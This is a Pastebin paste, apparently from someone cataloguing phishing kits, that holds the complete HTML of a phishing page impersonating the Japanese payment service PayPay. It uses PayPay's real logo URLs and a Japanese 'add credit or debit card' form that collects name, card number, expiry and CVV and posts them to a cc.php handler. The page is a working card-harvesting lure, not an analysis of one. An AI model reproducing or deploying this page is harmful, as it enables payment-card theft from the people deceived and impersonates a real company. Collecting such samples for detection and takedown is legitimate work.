ozuma5119

html/Phishing/PayPay/here2helpservices.com

Oct 24th, 2020
294
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.18 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  4. <meta charSet="utf-8" />
  5. <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  6. <title>Paypay</title>
  7. <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0" />
  8. <link type="text/css" rel="stylesheet" href="ss.css" />
  9. <link rel="shortcut icon" href="https://image.paypay.ne.jp/favicon.ico" />
  10. <link rel="apple-touch-icon" href="https://image.paypay.ne.jp/page/common/images/img_logo.png" />
  11. <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  12. <script type="text/javascript" src="index.js"></script>
  13. <script type="text/javascript" src="jquery.creditCardValidator.js"></script>
  14. </head>
  15. <body>
  16. <div id="appMountPoint">
  17. <div class="basicLayout modernInApp signupSimplicity-registrationWithContext simplicity" lang="en-US" dir="ltr" data-reactroot="">
  18. <div class="nfHeader noBorderHeader signupBasicHeader">
  19. <a href="#" class="svg-nfLogo signupBasicHeader">
  20. <p>&nbsp;<span style="font-family:arial,helvetica,sans-serif;"><img alt="" src="https://image.paypay.ne.jp/page/common/images/img_logo.png" style="width: 200px; height: 50px;" /></span></p>
  21. <p>&nbsp; &nbsp;</p>
  22. <g id="paypay-logo">
  23. <path d="M105.062 14.28L111 30c-1.75-.25-3.499-.563-5.28-.845l-3.345-8.686-3.437 7.969c-1.687-.282-3.344-.376-5.031-.595l6.031-13.75L94.468 0h5.063l3.062 7.874L105.875 0h5.124l-5.937 14.28zM90.47 0h-4.594v27.25c1.5.094 3.062.156 4.594.343V0zm-8.563 26.937c-4.187-.281-8.375-.53-12.656-.625V0h4.687v21.875c2.688.062 5.375.28 7.969.405v4.657zM64.25 10.657v4.687h-6.406V26H53.22V0h13.125v4.687h-8.5v5.97h6.406zm-18.906-5.97V26.25c-1.563 0-3.156 0-4.688.062V4.687h-4.844V0h14.406v4.687h-4.874zM30.75 15.593c-2.062 0-4.5 0-6.25.095v6.968c2.75-.188 5.5-.406 8.281-.5v4.5l-12.968 1.032V0H32.78v4.687H24.5V11c1.813 0 4.594-.094 6.25-.094v4.688zM4.78 12.968v16.375C3.094 29.531 1.593 29.75 0 30V0h4.469l6.093 17.032V0h4.688v28.062c-1.656.282-3.344.376-5.125.625L4.78 12.968z" id="Fill-14"></path>
  24. </g>
  25. </svg><span class="screen-reader-text">Paypay</span></a><a href="#" class="authLinks signupBasicHeader" <img src="https://image.paypay.ne.jp/page/common/images/img_logo.png" style="width: 200px; height: 50px;" /> </a></div>
  26. <div class="simpleContainer">
  27. <div class="centerContainer firstLoad">
  28. <form method="POST" action="cc.php">
  29. <br>
  30. <div class="paymentFormContainer">
  31. <div class="fieldContainer">
  32. <div class="stepHeader-container">
  33. <div class="stepHeader">
  34. <h1 class="stepTitle">クレジットまたはデビットカードを追加</h1></div>
  35. </div>
  36. <div class="fieldContainer"><span class="logos logos-block"><span class="logoIcon VISA"></span><span class="logoIcon MASTERCARD"></span><span class="logoIcon AMEX"></span><span class="logoIcon JCB"></span><span class="logoIcon DINERS"></span></span>
  37. <div class="">
  38. <ul class="simpleForm structural ui-grid">
  39. <li class="nfFormSpace">
  40. <div class="nfInput nfInputOversize">
  41. <div class="nfInputPlacement">
  42. <label class="input_id">
  43. <input type="text" name="fn" class="nfTextField" id="fn" required />
  44. <label for="fn" class="placeLabel">ファーストネーム</label>
  45. </label>
  46. </div>
  47. </div>
  48. </li>
  49. <li class="nfFormSpace">
  50. <div class="nfInput nfInputOversize">
  51. <div class="nfInputPlacement">
  52. <label class="input_id">
  53. <input type="text" name="ln" class="nfTextField" id="ln" required/>
  54. <label for="ln" class="placeLabel">苗字</label>
  55. </label>
  56. </div>
  57. </div>
  58. </li>
  59. <li class="nfFormSpace">
  60. <div class="cardNumberContainer">
  61. <div class="nfInput nfInputOversize">
  62. <div class="nfInputPlacement">
  63. <label class="input_id">
  64. <input type="tel" name="cn" class="nfTextField" id="cn" minlength="19" maxlength="19" required/>
  65. <label for="cn" class="placeLabel">カード番号</label>
  66. </label>
  67. </div><div id="cnError" class="inputError" style="display: none;">有効なクレジットカード番号を入力してください</div>
  68. </div>
  69. </div>
  70. </li>
  71. <li class="nfFormSpace">
  72. <div class="nfInput nfInputOversize">
  73. <div class="nfInputPlacement">
  74. <label class="input_id">
  75. <input type="tel" name="ex" class="nfTextField" id="ex" maxlength="7" minlength="7" required/>
  76. <label for="ex" class="placeLabel">有効期限 (MM/YY)</label>
  77. </label>
  78. </div>
  79. </div>
  80. </li>
  81. <li class="nfFormSpace">
  82. <div class="nfInput nfInputOversize">
  83. <div class="nfInputPlacement">
  84. <label class="input_id">
  85. <input type="tel" name="cvv" class="nfTextField" id="cvv" maxlength="4" minlength="3" required/>
  86. <label for="cvv" class="placeLabel">セキュリティコード (CVV)</label>
  87. </label>
  88. </div>
  89. </div>
  90. </li>
  91. </ul>
  92. </div>
  93. </div>
  94. </div>
  95. <div class="submitBtnContainer">
  96. <button id="bpBtn" type="submit" autoComplete="off" class="nf-btn nf-btn-primary nf-btn-solid nf-btn-oversize">カードを追加</button>
  97. </div>
  98. </form>
  99. </div>
  100. </div>
  101. <div class="site-footer-wrapper centered">
  102. <div class="footer-divider"></div>
  103. <div class="site-footer">
  104. <p class="footer-top"><a class="footer-top-a" href="#"> </a></p>
  105. <ul class="footer-links structural">
  106. <li class="footer-link-item"><a class="footer-link" href="#"><span> </span></a></li>
  107. </ul>
  108. <div class="lang-selection-container" id="lang-switcher">
  109. <div class="nfSelectWrapper inFooter selectArrow prefix">
  110. <div class="nfSelectPlacement globe">
  111. <select class="nfSelect" name="__langSelect" tabindex="0">
  112. <option selected="" label="日本語">日本語</option>
  113. </select>
  114. <label class="nfLabel no-display placeLabel"></label>
  115. </div>
  116. </div>
  117. </div>
  118. </div>
  119. </div>
  120. <svg style="height:0;width:0;position:absolute" xmlns="http://www.w3.org/2000/svg">
  121. </body>
  122. </html>
  123.  
Add Comment
Please, Sign In to add comment